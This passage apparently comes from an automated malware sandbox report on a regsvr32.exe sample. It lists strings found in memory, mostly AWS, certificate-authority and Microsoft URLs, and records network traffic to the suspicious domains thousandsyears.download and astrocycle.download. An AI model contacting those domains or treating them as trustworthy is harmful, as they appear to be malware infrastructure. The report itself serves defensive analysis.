https://s0.awsstatic.com https://s3.amazonaws.com/aws-messaging-pricing-information/ https://s3.amazonaws.com/public-pricing-agc/ https://spot-bid-advisor.s3.amazonaws.com https://view-stage.us-west-2.prod.pricing.aws.a2z.com https://view-staging.us-east-1.prod.plc1-prod.pricing.aws.a2z.com https://www.youtube-nocookie.com; font-src 'self' data: https://a0.awsstatic.com https://f0.awsstatic.com https://fonts.gstatic.com; frame-src 'self' https://c0.b0.p.awsstatic.com https://calculator.aws https://dpm.demdex.net https://www.youtube-nocookie.com; img-src 'self' data: https://.ads.linkedin.com https://.vidyard.com https://.ytimg.com https://a0.awsstatic.com https://amazonwebservices.d2.sc.omtrdc.net https://aws-quickstart.s3.amazonaws.com https://awsmedia.s3.amazonaws.com https://d1.awsstatic-china.com https://d1.awsstatic.com https://d2908q01vomqb2.cloudfront.net https://d36cz9buwru1tt.cloudfront.net https://docs.aws.amazon.com https://dpm.demdex.net https://fls-na.amazon.com https://googleads.g.doubleclick.net https://img.youtube.com https://marketingplatform.google.com https://media.amazonwebservices.com https://p.adsymptotic.com https://pages.awscloud.com https://s3.amazonaws.com/aws-quickstart/ https://ssl-static.libsyn.com https://static-cdn.jtvnw.net https://www.google.com https://www.linkedin.com https://yt3.ggpht.com; media-src 'self' https://.libsyn.com https://a0.awsstatic.com https://anchor.fm https://awsmedia.s3.amazonaws.com https://awspodcastsiberiaent.s3.eu-west-3.amazonaws.com https://chtbl.com https://d1.awsstatic.com https://d1hemuljm71t2j.cloudfront.net https://d1le29qyzha1u4.cloudfront.net https://d1oqpvwii7b6rh.cloudfront.net https://d1vo51ubqkiilx.cloudfront.net https://d1yyh5dhdgifnx.cloudfront.net https://d2908q01vomqb2.cloudfront.net https://d2a6igt6jhaluh.cloudfront.net https://d3ctxlq1ktw2nl.cloudfront.net https://d3h2ozso0dirfl.cloudfront.net https://dgen8gghn3u86.cloudfront.net https://dk261l6wntthl.cloudfront.net https://download.stormacq.com/aws/podcast/ https://dts.podtrac.com https://media.amazonwebservi
Source: regsvr32.exe, 00000004.00000003.2085118473.00000000003BC000.00000004.00000001.sdmp	String found in binary or memory: p%Content-Security-Policy-Report-Only: default-src 'self' data: https://a0.awsstatic.com; connect-src 'self' https://112-tzm-766.mktoresp.com https://112-tzm-766.mktoutil.com https://a0.awsstatic.com https://a0.p.awsstatic.com https://a1.awsstatic.com https://amazonwebservices.d2.sc.omtrdc.net https://amazonwebservicesinc.tt.omtrdc.net https://api.regional-table.region-services.aws.a2z.com https://api.us-west-2.prod.pricing.aws.a2z.com https://b0.p.awsstatic.com https://c0.b0.p.awsstatic.com https://calculator.aws https://d0.awsstatic.com https://d1.awsstatic.com https://d1fgizr415o1r6.cloudfront.net https://d3borx6sfvnesb.cloudfront.net https://dc.ads.linkedin.com https://dftu77xade0tc.cloudfront.net https://dpm.demdex.net https://fls-na.amazon.com https://googleads.g.doubleclick.net https://i18n-string.us-west-2.prod.pricing.aws.a2z.com https://prod.log.shortbread.aws.dev https://prod.tools.shortbread.aws.dev https://s0.awsstatic.com https://s3.amazonaws.com/aws-messaging-pricing-information/ https://s3.amazonaws.com/public-pricing-agc/ https://spot-bid-advisor.s3.amazonaws.com https://view-stage.us-west-2.prod.pricing.aws.a2z.com https://view-staging.us-east-1.prod.plc1-prod.pricing.aws.a2z.com https://www.youtube-nocookie.com; font-src 'self' data: https://a0.awsstatic.com https://f0.awsstatic.com https://fonts.gstatic.com; frame-src 'self' https://c0.b0.p.awsstatic.com https://calculator.aws https://dpm.demdex.net https://www.youtube-nocookie.com; img-src 'self' data: https://.ads.linkedin.com https://.vidyard.com https://.ytimg.com https://a0.awsstatic.com https://amazonwebservices.d2.sc.omtrdc.net https://aws-quickstart.s3.amazonaws.com https://awsmedia.s3.amazonaws.com https://d1.awsstatic-china.com https://d1.awsstatic.com https://d2908q01vomqb2.cloudfront.net https://d36cz9buwru1tt.cloudfront.net https://docs.aws.amazon.com https://dpm.demdex.net https://fls-na.amazon.com https://googleads.g.doubleclick.net https://img.youtube.com https://marketingplatform.google.com https://media.amazonwebservices.com https://p.adsymptotic.com https://pages.awscloud.com https://s3.amazonaws.com/aws-quickstart/ https://ssl-static.libsyn.com https://static-cdn.jtvnw.net https://www.google.com https://www.linkedin.com https://yt3.ggpht.com; media-src 'self' https://.libsyn.com https://a0.awsstatic.com https://anchor.fm https://awsmedia.s3.amazonaws.com https://awspodcastsiberiaent.s3.eu-west-3.amazonaws.com https://chtbl.com https://d1.awsstatic.com https://d1hemuljm71t2j.cloudfront.net https://d1le29qyzha1u4.cloudfront.net https://d1oqpvwii7b6rh.cloudfront.net https://d1vo51ubqkiilx.cloudfront.net https://d1yyh5dhdgifnx.cloudfront.net https://d2908q01vomqb2.cloudfront.net https://d2a6igt6jhaluh.cloudfront.net https://d3ctxlq1ktw2nl.cloudfront.net https://d3h2ozso0dirfl.cloudfront.net https://dgen8gghn3u86.cloudfront.net https://dk261l6wntthl.cloudfront.net https://download.stormacq.com/aws/podcast/ https://dts.podtrac.com https://media.amazonwebservi
Source: regsvr32.exe, 00000004.00000002.2088647522.00000000003D7000.00000004.00000020.sdmp	String found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)

Source: unknown

DNS traffic detected: queries for: thousandsyears.download

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 06 Jul 2021 13:57:24 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=uV9QsWC152rxthQ1uxb2nhb6QfxJOBUyvZzkW%2Bm5eNZr%2FfY1OoMjjdn%2BqwGvovRoti9wtyDjMb%2BRHA3uE1%2BUl29GACROx386dHI4LZByNrW4JVScGH%2BdagSI%2FVwGO1H5CA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 66a957895c5cbef6-FRAalt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400Data Raw: 31 31 31 0d 0a 09 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 09 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 09 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 09 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 09 3c 68 72 3e 0a 09 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 61 73 74 72 6f 63 79 63 6c 65 2e 64 6f 77 6e 6c 6f 61 64 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 09 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: 111<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at astrocycle.download Port 80</address></body></html>

Source: regsvr32.exe, 00000004.00000002.2088617983.00000000003AE000.00000004.00000020.sdmp	String found in binary or memory: http://astrocycle.download/
Source: regsvr32.exe, 00000004.00000002.2088647522.00000000003D7000.00000004.00000020.sdmp	String found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
Source: regsvr32.exe, 00000004.00000002.2088647522.00000000003D7000.00000004.00000020.sdmp	String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: regsvr32.exe, 00000004.00000002.2088647522.00000000003D7000.00000004.00000020.sdmp	String found in binary or memory: http://crl.entrust.net/server1.crl0
Source: regsvr32.exe, 00000004.00000002.2088647522.00000000003D7000.00000004.00000020.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: regsvr32.exe, 00000004.00000002.2088647522.00000000003D7000.00000004.00000020.sdmp	String found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: regsvr32.exe, 00000004.00000002.2088647522.00000000003D7000.00000004.00000020.sdmp	String found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
Source: regsvr32.exe, 00000004.00000002.2088647522.00000000003D7000.00000004.00000020.sdmp	String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: regsvr32.exe, 00000004.00000003.2085118473.00000000003BC000.00000004.00000001.sdmp	String found in binary or memory: http://crl.rootg2.amazo
Source: regsvr32.exe, 00000004.00000002.2088647522.00000000003D7000.00000004.00000020.sdmp	String found in binary or memory: http://crl.rootg2.amazontrust.com/rootg2.crl0
Source: regsvr32.exe, 00000004.00000002.2088647522.00000000003D7000.00000004.00000020.sdmp, regsvr32.exe, 00000004.00000003.2085118473.00000000003BC000.00000004.00000001.sdmp	String found in binary or memory: http://crl.sca1b.amazontrust.com/sca1b.crl0
Source: regsvr32.exe, 00000004.00000002.2088629916.00000000003BD000.00000004.00000020.sdmp	String found in binary or memory: http://crl.sca1b.amazontrust.com/sca1b.crl0g0-
Source: regsvr32.exe, 00000004.00000002.2088647522.00000000003D7000.00000004.00000020.sdmp	String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: regsvr32.exe, 00000004.00000002.2088647522.00000000003D7000.00000004.00000020.sdmp	String found in binary or memory: http://crt.rootg2.amazontrust.com/rootg2.cer0=
Source: regsvr32.exe, 00000004.00000003.2085118473.00000000003BC000.00000004.00000001.sdmp	String found in binary or memory: http://crt.sca1b.a
Source: regsvr32.exe, 00000004.00000003.2085118473.00000000003BC000.00000004.00000001.sdmp	String found in binary or memory: http://crt.sca1b.aP
Source: regsvr32.exe, 00000004.00000002.2088647522.00000000003D7000.00000004.00000020.sdmp	String found in binary or memory: http://crt.sca1b.amazontrust.com/sca1b.crt0
Source: regsvr32.exe, 00000004.00000002.2090433809.00000000031F0000.00000002.00000001.sdmp	String found in binary or memory: http://investor.msn.com
Source: regsvr32.exe, 00000004.00000002.2090433809.00000000031F0000.00000002.00000001.sdmp	String found in binary or memory: http://investor.msn.com/
Source: regsvr32.exe, 00000004.00000002.2090646268.00000000033D7000.00000002.00000001.sdmp	String found in binary or memory: http://localizability/practices/XML.asp
Source: regsvr32.exe, 00000004.00000002.2090646268.00000000033D7000.00000002.00000001.sdmp	String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: regsvr32.exe, 00000004.00000002.2088647522.00000000003D7000.00000004.00000020.sdmp	String found in binary or memory: http://o.ss2.us/0
Source: regsvr32.exe, 00000004.00000002.2088647522.00000000003D7000.00000004.00000020.sdmp	String found in binary or memory: http://ocsp.comodoca.com0
Source: regsvr32.exe, 00000004.00000002.2088647522.00000000003D7000.00000004.00000020.sdmp	String found in binary or memory: http://ocsp.comodoca.com0%
Source: regsvr32.exe, 00000004.00000002.2088647522.00000000003D7000.00000004.00000020.sdmp	String found in binary or memory: http://ocsp.comodoca.com0-
Source: regsvr32.exe, 00000004.00000002.2088647522.00000000003D7000.00000004.00000020.sdmp	String found in binary or memory: http://ocsp.comodoca.com0/
Source: regsvr32.exe, 00000004.00000002.2088647522.00000000003D7000.00000004.00000020.sdmp	String found in binary or memory: http://ocsp.comodoca.com05
Source: regsvr32.exe, 00000004.00000002.2088647522.00000000003D7000.00000004.00000020.sdmp	String found in binary or memory: http://ocsp.entrust.net03
Source: regsvr32.exe, 00000004.00000002.2088647522.00000000003D7000.00000004.00000020.sdmp	String found in binary or memory: http://ocsp.entrust.net0D
Source: regsvr32.exe, 00000004.00000002.2088647522.00000000003D7000.00000004.00000020.sdmp	String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: regsvr32.exe, 00000004.00000002.2088647522.00000000003D7000.00000004.00000020.sdmp	String found in binary or memory: http://ocsp.rootg2.amazontrust.com08
Source: regsvr32.exe, 00000004.00000002.2088647522.00000000003D7000.00000004.00000020.sdmp	String found in binary or memory: http://ocsp.sca1b.amazontrust.com06
Source: regsvr32.exe, 00000004.00000002.2088647522.00000000003D7000.00000004.00000020.sdmp	String found in binary or memory: http://s.ss2.us/r.crl0
Source: regsvr32.exe, 00000004.00000002.2090028990.0000000002E00000.00000002.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: regsvr32.exe, 00000003.00000002.2081548009.0000000001D10000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2088762490.0000000001DC0000.00000002.00000001.sdmp, regsvr32.exe, 00000005.00000002.2089550457.0000000001CC0000.00000002.00000001.sdmp	String found in binary or memory: http://servername/isapibackend.dll
Source: regsvr32.exe, 00000004.00000002.2090646268.00000000033D7000.00000002.00000001.sdmp	String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: regsvr32.exe, 00000004.00000002.2090646268.00000000033D7000.00000002.00000001.sdmp	String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: regsvr32.exe, 00000004.00000002.2090028990.0000000002E00000.00000002.00000001.sdmp	String found in binary or memory: http://www.%s.comPA
Source: regsvr32.exe, 00000004.00000002.2088647522.00000000003D7000.00000004.00000020.sdmp	String found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: regsvr32.exe, 00000004.00000002.2088647522.00000000003D7000.00000004.00000020.sdmp	String found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: regsvr32.exe, 00000004.00000002.2090433809.00000000031F0000.00000002.00000001.sdmp	String found in binary or memory: http://www.hotmail.com/oe
Source: regsvr32.exe, 00000004.00000002.2090646268.00000000033D7000.00000002.00000001.sdmp	String found in binary or memory: http://www.icra.org/vocabulary/.
Source: regsvr32.exe, 00000004.00000002.2090433809.00000000031F0000.00000002.00000001.sdmp	String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: regsvr32.exe, 00000004.00000002.2090433809.00000000031F0000.00000002.00000001.sdmp	String found in binary or memory: http://www.windows.com/pctv.
Source: regsvr32.exe, 00000004.00000002.2088647522.00000000003D7000.00000004.00000020.sdmp	String found in binary or memory: http://x.ss2.us/x.cer0&
Source: regsvr32.exe, 00000004.00000003.2085202089.0000000002BA2000.00000004.00000001.sdmp	String found in binary or memory: https://112-tzm-766.mktoresp.com
Source: regsvr32.exe, 00000004.00000003.2085202089.0000000002BA2000.00000004.00000001.sdmp	String found in binary or memory: https://112-tzm-766.mktoutil.com
Source: regsvr32.exe, 00000004.00000003.2085202089.0000000002BA2000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2085214274.00000000003D6000.00000004.00000001.sdmp	String found in binary or memory: https://a0.awsstatic.com
Source: regsvr32.exe, 00000004.00000002.2089990455.0000000002C12000.00000004.00000001.sdmp	String found in binary or memory: https://a0.awsstatic.com/aws-blog/1.0.47/js
Source: regsvr32.exe, 00000004.00000002.2089990455.0000000002C12000.00000004.00000001.sdmp	String found in binary or memory: https://a0.awsstatic.com/da/js/1.0.47/aws-da.js
Source: regsvr32.exe, 00000004.00000002.2089990455.0000000002C12000.00000004.00000001.sdmp	String found in binary or memory: https://a0.awsstatic.com/g11n-lib/2.0.76
Source: regsvr32.exe, 00000004.00000002.2089990455.0000000002C12000.00000004.00000001.sdmp	String found in binary or memory: https://a0.awsstatic.com/libra-css/css/1.0.382
Source: regsvr32.exe, 00000004.00000002.2089990455.0000000002C12000.00000004.00000001.sdmp	String found in binary or memory: https://a0.awsstatic.com/libra-css/css/1.0.382/style-awsm.css
Source: regsvr32.exe, 00000004.00000002.2089990455.0000000002C12000.00000004.00000001.sdmp	String found in binary or memory: https://a0.awsstatic.com/libra-css/images
Source: regsvr32.exe, 00000004.00000002.2089990455.0000000002C12000.00000004.00000001.sdmp	String found in binary or memory: https://a0.awsstatic.com/libra-css/images/gi-map/AWS_Global-Infrastructure-Map.svg
Source: regsvr32.exe, 00000004.00000002.2089990455.0000000002C12000.00000004.00000001.sdmp	String found in binary or memory: https://a0.awsstatic.com/libra-css/images/logos/aws_logo_smile_1200x630.png
Source: regsvr32.exe, 00000004.00000002.2089990455.0000000002C12000.00000004.00000001.sdmp	String found in binary or memory: https://a0.awsstatic.com/libra-css/images/logos/aws_logo_smile_179x109.png
Source: regsvr32.exe, 00000004.00000002.2089990455.0000000002C12000.00000004.00000001.sdmp	String found in binary or memory: https://a0.awsstatic.com/libra-css/images/site/fav/favicon.ico
Source: regsvr32.exe, 00000004.00000002.2089990455.0000000002C12000.00000004.00000001.sdmp	String found in binary or memory: https://a0.awsstatic.com/libra-css/images/site/touch-icon-ipad-144-smile.png
Source: regsvr32.exe, 00000004.00000002.2089990455.0000000002C12000.00000004.00000001.sdmp	String found in binary or memory: https://a0.awsstatic.com/libra-css/images/site/touch-icon-iphone-114-smile.png
Source: regsvr32.exe, 00000004.00000002.2089990455.0000000002C12000.00000004.00000001.sdmp	String found in binary or memory: https://a0.awsstatic.com/libra-search/1.0.13/js
Source: regsvr32.exe, 00000004.00000002.2089990455.0000000002C12000.00000004.00000001.sdmp	String found in binary or memory: https://a0.awsstatic.com/libra/1.0.385/directories
Source: regsvr32.exe, 00000004.00000002.2089990455.0000000002C12000.00000004.00000001.sdmp	String found in binary or memory: https://a0.awsstatic.com/libra/1.0.385/libra-cardsui
Source: regsvr32.exe, 00000004.00000002.2089990455.0000000002C12000.00000004.00000001.sdmp	String found in binary or memory: https://a0.awsstatic.com/libra/1.0.385/libra-head.js
Source: regsvr32.exe, 00000004.00000002.2089990455.0000000002C12000.00000004.00000001.sdmp	String found in binary or memory: https://a0.awsstatic.com/libra/1.0.385/librastandardlib
Source: regsvr32.exe, 00000004.00000002.2089990455.0000000002C12000.00000004.00000001.sdmp	String found in binary or memory: https://a0.awsstatic.com/plc/js/1.0.112/plc
Source: regsvr32.exe, 00000004.00000002.2089990455.0000000002C12000.00000004.00000001.sdmp	String found in binary or memory: https://a0.awsstatic.com/pricing-calculator/js/1.0.2
Source: regsvr32.exe, 00000004.00000002.2089990455.0000000002C12000.00000004.00000001.sdmp	String found in binary or memory: https://a0.awsstatic.com/pricing-savings-plan/js/1.0.6
Source: regsvr32.exe, 00000004.00000002.2089990455.0000000002C12000.00000004.00000001.sdmp	String found in binary or memory: https://a0.awsstatic.com/psf/null
Source: regsvr32.exe, 00000004.00000002.2089990455.0000000002C12000.00000004.00000001.sdmp	String found in binary or memory: https://a0.awsstatic.com/s_code/js/3.0/awshome_s_code.js
Source: regsvr32.exe, 00000004.00000002.2089990455.0000000002C12000.00000004.00000001.sdmp	String found in binary or memory: https://a0.awsstatic.com/target/1.0.114/aws-target-mediator.js
Source: regsvr32.exe, 00000004.00000003.2085202089.0000000002BA2000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2085214274.00000000003D6000.00000004.00000001.sdmp	String found in binary or memory: https://a0.awsstatic.com;
Source: regsvr32.exe, 00000004.00000003.2085202089.0000000002BA2000.00000004.00000001.sdmp	String found in binary or memory: https://a0.p.awsstatic.com
Source: regsvr32.exe, 00000004.00000003.2085202089.0000000002BA2000.00000004.00000001.sdmp	String found in binary or memory: https://a1.awsstatic.com
Source: regsvr32.exe, 00000004.00000002.2088647522.00000000003D7000.00000004.00000020.sdmp	String found in binary or memory: https://amazon.com/
Source: regsvr32.exe, 00000004.00000002.2088647522.00000000003D7000.00000004.00000020.sdmp	String found in binary or memory: https://amazon.com/S
Source: regsvr32.exe, 00000004.00000003.2085202089.0000000002BA2000.00000004.00000001.sdmp	String found in binary or memory: https://amazonwebservices.d2.sc.omtrdc.net
Source: regsvr32.exe, 00000004.00000003.2085202089.0000000002BA2000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2085214274.00000000003D6000.00000004.00000001.sdmp	String found in binary or memory: https://amazonwebservicesinc.tt.omtrdc.net
Source: regsvr32.exe, 00000004.00000003.2085202089.0000000002BA2000.00000004.00000001.sdmp	String found in binary or memory: https://anchor.fm
Source: regsvr32.exe, 00000004.00000003.2085202089.0000000002BA2000.00000004.00000001.sdmp	String found in binary or memory: https://api.regional-table.region-services.aws.a2z.com
Source: regsvr32.exe, 00000004.00000003.2085202089.0000000002BA2000.00000004.00000001.sdmp	String found in binary or memory: https://api.us-west-2.prod.pricing.aws.a2z.com
Source: regsvr32.exe, 00000004.00000003.2085202089.0000000002BA2000.00000004.00000001.sdmp	String found in binary or memory: https://aws-quickstart.s3.amazonaws.com
Source: regsvr32.exe, 00000004.00000003.2085118473.00000000003BC000.00000004.00000001.sdmp	String found in binary or memory: https://aws.amazon.com/
Source: regsvr32.exe, 00000004.00000002.2089990455.0000000002C12000.00000004.00000001.sdmp	String found in binary or memory: https://aws.amazon.com/?nc1=h_ls
Source: regsvr32.exe, 00000004.00000002.2089990455.0000000002C12000.00000004.00000001.sdmp	String found in binary or memory: https://aws.amazon.com/?nc2=h_lg
Source: regsvr32.exe, 00000004.00000002.2089990455.0000000002C12000.00000004.00000001.sdmp	String found in binary or memory: https://aws.amazon.com/ar/
Source: regsvr32.exe, 00000004.00000002.2089990455.0000000002C12000.00000004.00000001.sdmp	String found in binary or memory: https://aws.amazon.com/ar/?nc1=h_ls
Source: regsvr32.exe, 00000004.00000002.2089990455.0000000002C12000.00000004.00000001.sdmp	String found in binary or memory: https://aws.amazon.com/cn/
Source: regsvr32.exe, 00000004.00000002.2089990455.0000000002C12000.00000004.00000001.sdmp	String found in binary or memory: https://aws.amazon.com/cn/?nc1=h_ls
Source: regsvr32.exe, 00000004.00000002.2089990455.0000000002C12000.00000004.00000001.sdmp	String found in binary or memory: https://aws.amazon.com/de/
Source: regsvr32.exe, 00000004.00000002.2089990455.0000000002C12000.00000004.00000001.sdmp	String found in binary or memory: https://aws.amazon.com/de/?nc1=h_ls
Source: regsvr32.exe, 00000004.00000002.2089990455.0000000002C12000.00000004.00000001.sdmp	String found in binary or memory: https://aws.amazon.com/es/
Source: regsvr32.exe, 00000004.00000002.2089990455.0000000002C12000.00000004.00000001.sdmp	String found in binary or memory: https://aws.amazon.com/es/?nc1=h_ls
Source: regsvr32.exe, 00000004.00000002.2089990455.0000000002C12000.00000004.00000001.sdmp	String found in binary or memory: https://aws.amazon.com/fr/
Source: regsvr32.exe, 00000004.00000002.2089990455.0000000002C12000.00000004.00000001.sdmp	String found in binary or memory: https://aws.amazon.com/fr/?nc1=h_ls
Source: regsvr32.exe, 00000004.00000002.2089990455.0000000002C12000.00000004.00000001.sdmp	String found in binary or memory: https://aws.amazon.com/id/
Source: regsvr32.exe, 00000004.00000002.2089990455.0000000002C12000.00000004.00000001.sdmp	String found in binary or memory: https://aws.amazon.com/id/?nc1=h_ls
Source: regsvr32.exe, 00000004.00000002.2089990455.0000000002C12000.00000004.00000001.sdmp	String found in binary or memory: https://aws.amazon.com/it/
Source: regsvr32.exe, 00000004.00000002.2089990455.0000000002C12000.00000004.00000001.sdmp	String found in binary or memory: https://aws.amazon.com/it/?nc1=h_ls
Source: regsvr32.exe, 00000004.00000002.2089990455.0000000002C12000.00000004.00000001.sdmp	String found in binary or memory: https://aws.amazon.com/jp/
Source: regsvr32.exe, 00000004.00000002.2089990455.0000000002C12000.00000004.00000001.sdmp	String found in binary or memory: https://aws.amazon.com/jp/?nc1=h_ls
Source: regsvr32.exe, 00000004.00000002.2089990455.0000000002C12000.00000004.00000001.sdmp	String found in binary or memory: https://aws.amazon.com/ko/
Source: regsvr32.exe, 00000004.00000002.2089990455.0000000002C12000.00000004.00000001.sdmp	String found in binary or memory: https://aws.amazon.com/ko/?nc1=h_ls
Source: regsvr32.exe, 00000004.00000002.2089990455.0000000002C12000.00000004.00000001.sdmp	String found in binary or memory: https://aws.amazon.com/marketplace/?nc2=h_mo
Source: regsvr32.exe, 00000004.00000002.2089990455.0000000002C12000.00000004.00000001.sdmp	String found in binary or memory: https://aws.amazon.com/marketplace/?nc2=h_ql_mp
Source: regsvr32.exe, 00000004.00000002.2089990455.0000000002C12000.00000004.00000001.sdmp	String found in binary or memory: https://aws.amazon.com/podcasts/aws-podcast/
Source: regsvr32.exe, 00000004.00000002.2089990455.0000000002C12000.00000004.00000001.sdmp	String found in binary or memory: https://aws.amazon.com/privacy/?nc1=f_pr
Source: regsvr32.exe, 00000004.00000002.2089990455.0000000002C12000.00000004.00000001.sdmp	String found in binary or memory: https://aws.amazon.com/pt/
Source: regsvr32.exe, 00000004.00000002.2089990455.0000000002C12000.00000004.00000001.sdmp	String found in binary or memory: https://aws.amazon.com/pt/?nc1=h_ls
Source: regsvr32.exe, 00000004.00000002.2089990455.0000000002C12000.00000004.00000001.sdmp	String found in binary or memory: https://aws.amazon.com/ru/
Source: regsvr32.exe, 00000004.00000002.2089990455.0000000002C12000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2085118473.00000000003BC000.00000004.00000001.sdmp	String found in binary or memory: https://aws.amazon.com/ru/?nc1=h_ls
Source: regsvr32.exe, 00000004.00000002.2089990455.0000000002C12000.00000004.00000001.sdmp	String found in binary or memory: https://aws.amazon.com/search
Source: regsvr32.exe, 00000004.00000002.2089990455.0000000002C12000.00000004.00000001.sdmp	String found in binary or memory: https://aws.amazon.com/search/
Source: regsvr32.exe, 00000004.00000002.2089990455.0000000002C12000.00000004.00000001.sdmp	String found in binary or memory: https://aws.amazon.com/search/?searchQuery=
Source: regsvr32.exe, 00000004.00000002.2089990455.0000000002C12000.00000004.00000001.sdmp	String found in binary or memory: https://aws.amazon.com/terms/?nc1=f_pr
Source: regsvr32.exe, 00000004.00000002.2089990455.0000000002C12000.00000004.00000001.sdmp	String found in binary or memory: https://aws.amazon.com/th/
Source: regsvr32.exe, 00000004.00000002.2089990455.0000000002C12000.00000004.00000001.sdmp	String found in binary or memory: https://aws.amazon.com/th/?nc1=f_ls
Source: regsvr32.exe, 00000004.00000002.2089990455.0000000002C12000.00000004.00000001.sdmp	String found in binary or memory: https://aws.amazon.com/tr/
Source: regsvr32.exe, 00000004.00000002.2089990455.0000000002C12000.00000004.00000001.sdmp	String found in binary or memory: https://aws.amazon.com/tr/?nc1=h_ls
Source: regsvr32.exe, 00000004.00000002.2089990455.0000000002C12000.00000004.00000001.sdmp	String found in binary or memory: https://aws.amazon.com/tw/
Source: regsvr32.exe, 00000004.00000002.2089990455.0000000002C12000.00000004.00000001.sdmp	String found in binary or memory: https://aws.amazon.com/tw/?nc1=h_ls
Source: regsvr32.exe, 00000004.00000002.2089990455.0000000002C12000.00000004.00000001.sdmp	String found in binary or memory: https://aws.amazon.com/vi/
Source: regsvr32.exe, 00000004.00000002.2089990455.0000000002C12000.00000004.00000001.sdmp	String found in binary or memory: https://aws.amazon.com/vi/?nc1=f_ls
Source: regsvr32.exe, 00000004.00000003.2085202089.0000000002BA2000.00000004.00000001.sdmp	String found in binary or memory: https://awsmedia.s3.amazonaws.com
Source: regsvr32.exe, 00000004.00000003.2085202089.0000000002BA2000.00000004.00000001.sdmp	String found in binary or memory: https://awspodcastsiberiaent.s3.eu-west-3.amazonaws.com
Source: regsvr32.exe, 00000004.00000003.2085202089.0000000002BA2000.00000004.00000001.sdmp	String found in binary or memory: https://b0.p.awsstatic.com
Source: regsvr32.exe, 00000004.00000003.2085202089.0000000002BA2000.00000004.00000001.sdmp	String found in binary or memory: https://c0.b0.p.awsstatic.com
Source: regsvr32.exe, 00000004.00000003.2085202089.0000000002BA2000.00000004.00000001.sdmp	String found in binary or memory: https://calculator.aws
Source: regsvr32.exe, 00000004.00000003.2085202089.0000000002BA2000.00000004.00000001.sdmp	String found in binary or memory: https://chtbl.com
Source: regsvr32.exe, 00000004.00000002.2089990455.0000000002C12000.00000004.00000001.sdmp	String found in binary or memory: https://console.aws.amazon.com/?nc2=h_m_mc
Source: regsvr32.exe, 00000004.00000002.2089990455.0000000002C12000.00000004.00000001.sdmp	String found in binary or memory: https://console.aws.amazon.com/billing/home?nc2=h_m_bc
Source: regsvr32.exe, 00000004.00000002.2089990455.0000000002C12000.00000004.00000001.sdmp	String found in binary or memory: https://console.aws.amazon.com/console/home
Source: regsvr32.exe, 00000004.00000002.2089990455.0000000002C12000.00000004.00000001.sdmp	String found in binary or memory: https://console.aws.amazon.com/console/home?nc1=f_ct&src=footer-signin-mobile
Source: regsvr32.exe, 00000004.00000002.2089990455.0000000002C12000.00000004.00000001.sdmp	String found in binary or memory: https://console.aws.amazon.com/iam/home?nc2=h_m_sc#security_credential
Source: regsvr32.exe, 00000004.00000002.2089990455.0000000002C12000.00000004.00000001.sdmp	String found in binary or memory: https://console.aws.amazon.com/support/home/?nc1=f_dr
Source: regsvr32.exe, 00000004.00000002.2089990455.0000000002C12000.00000004.00000001.sdmp	String found in binary or memory: https://console.aws.amazon.com/support/home/?nc2=h_ql_cu
Source: regsvr32.exe, 00000004.00000002.2089990455.0000000002C12000.00000004.00000001.sdmp	String found in binary or memory: https://console.aws.amazon.com/support/home?nc2=h_ql_cu
Source: regsvr32.exe, 00000004.00000003.2085202089.0000000002BA2000.00000004.00000001.sdmp	String found in binary or memory: https://d0.awsstatic.com
